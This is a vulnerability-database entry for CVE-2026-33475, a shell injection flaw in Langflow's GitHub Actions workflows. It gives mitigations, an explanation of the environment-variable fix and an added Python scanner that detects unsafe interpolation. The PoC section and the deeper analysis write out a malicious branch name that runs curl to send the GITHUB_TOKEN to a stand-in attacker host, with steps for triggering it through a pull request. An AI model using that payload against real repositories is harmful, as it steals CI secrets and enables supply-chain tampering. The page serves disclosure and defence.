CVE-2026-33475
Published: 24 March 2026
Summary
CVE-2026-33475 is a critical-severity Injection (CWE-74) vulnerability in Langflow. Its CVSS base score is 9.1 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Poisoned Pipeline Execution (T1677); it is ranked at the 19.2nd percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Machine Learning Libraries; in the Privacy and Disclosure risk domain.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-10 (Information Input Validation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly requires validation and sanitization of untrusted, user-controlled inputs such as GitHub branch names and PR titles before they are interpolated into shell commands, preventing command injection.
- CM-6 (Configuration Settings): ensures GitHub Actions workflows are configured with secure settings, such as passing values through environment variables with proper quoting, to block unsanitized interpolation of context variables.
- SI-2 (Flaw Remediation): mandates timely identification and correction of flaws in CI/CD workflows, as implemented in Langflow version 1.9.0 by refactoring the vulnerable `run:` steps.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Unsanitized GitHub context interpolation in workflow `run:` steps directly enables Poisoned Pipeline Execution (T1677) via malicious branch names or PR inputs; this facilitates Supply Chain Compromise (T1195.002) by granting CI privileges that can be used for release tampering and artifact poisoning; the core mechanism is arbitrary Unix shell command injection (T1059.004).
NVD Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

### Details

Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:

```yaml
run: |
  validate_branch_name "${{ github.event.pull_request.head.ref }}"
```

Or:

```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```

Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.

### PoC

1. **Fork** the Langflow repository
2. **Create a new branch** with the name:
   ```bash
   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```
3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)
5. The `run:` step containing:
   ```yaml
   echo "Branch: ${{ github.head_ref }}"
   ```
   will execute:
   ```bash
   echo "Branch: injection-test"
   curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```
6. The attacker receives the CI secret via the exfil URL.

### Impact

- **Type:** Shell Injection / Remote Code Execution in CI
- **Scope:** Any public Langflow fork with GitHub Actions enabled
- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

### Suggested Fix

Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:

```yaml
env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  echo "Branch is: \"$BRANCH_NAME\""
```

Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.

### Affected Files (Langflow `1.3.4`)

- `.github/actions/install-playwright/action.yml`
- `.github/workflows/deploy-docs-draft.yml`
- `.github/workflows/docker-build.yml`
- `.github/workflows/release_nightly.yml`
- `.github/workflows/python_test.yml`
- `.github/workflows/typescript_test.yml`
Deeper analysis
CVE-2026-33475 is an unauthenticated remote shell injection vulnerability in multiple GitHub Actions workflows within the Langflow repository, a tool for building and deploying AI-powered agents and workflows. The issue affects versions prior to 1.9.0 and stems from unsanitized interpolation of GitHub context variables, such as `${{ github.head_ref }}` or `${{ github.event.pull_request.head.ref }}`, directly into `run:` steps. This allows arbitrary shell command injection through user-controlled inputs like branch names, pull request titles, or custom inputs. Affected files include `.github/actions/install-playwright/action.yml`, `.github/workflows/deploy-docs-draft.yml`, `.github/workflows/docker-build.yml`, `.github/workflows/release_nightly.yml`, `.github/workflows/python_test.yml`, and `.github/workflows/typescript_test.yml`.
Any unauthenticated attacker can exploit this by forking a public Langflow repository with GitHub Actions enabled, creating a branch with a malicious name containing shell commands (e.g., `injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN`), and opening a pull request to the main branch. When the workflow triggers, such as `deploy-docs-draft.yml`, the injected commands execute with CI privileges, enabling full access to secrets like `GITHUB_TOKEN`, exfiltration of sensitive data, pushing malicious tags or images, tampering with releases, or broader supply chain compromise. The vulnerability has a CVSS score of 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) and maps to CWE-74 and CWE-78.
Langflow version 1.9.0 patches the vulnerability. The GitHub security advisory (GHSA-87cc-65ph-2j4w) recommends refactoring workflows to avoid direct interpolation of user-controlled GitHub context variables in `run:` steps, instead passing them through environment variables and referencing those inside double quotes, such as `env: BRANCH_NAME: ${{ github.head_ref }}` followed by `run: echo "Branch is: \"$BRANCH_NAME\""`. Because the value then reaches the script as an environment variable rather than as text spliced into the script before the shell parses it, the shell treats it as data, not as command syntax, which prevents command injection.
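As an added example (not code from this page, the advisory, or the Langflow project), a small Python scanner that applies the rule stated in the advisory's Details and Suggested Fix sections and in the analysis above: it flags `${{ }}` expressions naming attacker-influenced context only when they sit inside a `run:` step, and ignores the same expressions once moved to `env:` as the patch recommends. The untrusted-context list and the sample workflow fragment are constructed for this example.

```python
import re

# Context fields an outside contributor can influence. Constructed list: the advisory's
# own examples (head_ref, PR head ref, PR title, inputs.*) plus commonly cited siblings.
UNTRUSTED_RE = re.compile(
    r"github\.head_ref"
    r"|github\.event\.pull_request\.(head\.(ref|label)|title|body)"
    r"|github\.event\.(issue|comment)\.(title|body)"
    r"|\binputs\.[A-Za-z0-9_-]+"
)
EXPR_RE = re.compile(r"\$\{\{(.*?)\}\}")   # one ${{ ... }} expression, inner text captured
RUN_RE = re.compile(r"(-\s+)?run:")        # a run: key, optionally as a list item '- run:'

def find_unsafe_interpolations(workflow_yaml: str) -> list[tuple[int, str]]:
    """Return (line_no, expression) for every ${{ }} expression inside a run:
    step that names attacker-influenced context. A run: block scalar lasts while
    lines are blank or indented deeper than the key, so env: values are not scanned."""
    findings, in_run, run_indent = [], False, -1
    for line_no, line in enumerate(workflow_yaml.splitlines(), start=1):
        body = line.lstrip()
        indent = len(line) - len(body)
        if in_run and body and indent <= run_indent:
            in_run = False                  # back at sibling-key level: run: ended
        m = RUN_RE.match(body)
        if m:                               # '- run:' puts the key after the dash
            in_run, run_indent = True, indent + len(m.group(1) or "")
        if in_run:
            for expr in EXPR_RE.findall(line):
                if UNTRUSTED_RE.search(expr):
                    findings.append((line_no, expr.strip()))
    return findings

# Constructed workflow fragment mirroring the advisory's vulnerable and patched steps.
SAMPLE_WORKFLOW = """\
jobs:
  ci:
    steps:
      - run: |
          echo "Branch: ${{ github.head_ref }}"
          validate_branch_name "${{ github.event.pull_request.head.ref }}"
      - run: npx playwright install ${{ inputs.browsers }} --with-deps
      - env:
          BRANCH_NAME: ${{ github.head_ref }}
        run: echo "Branch is: $BRANCH_NAME"
      - run: echo "${{ runner.os }}"
"""

if __name__ == "__main__":
    for line_no, expr in find_unsafe_interpolations(SAMPLE_WORKFLOW):
        print(f"line {line_no}: untrusted ${{{{ {expr} }}}} inside a run: step")
```

Run against a checkout's `.github/` tree, the scanner reports the three vulnerable lines of the sample and stays silent on the `env:`-based step and on trusted context such as `runner.os`.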
Langflow's focus on AI-powered agents and workflows gives this CI/CD vulnerability particular relevance to AI/ML supply chains, as compromises could propagate tainted artifacts into production AI deployments.
Details
- CWE(s): CWE-74, CWE-78
- Affected Products: Langflow prior to version 1.9.0
AI Security Analysis
- AI Category: Machine Learning Libraries
- Risk Domain: Privacy and Disclosure
- OWASP Top 10 for LLMs 2025: None mapped
- Classification Reason: Matched keywords: ai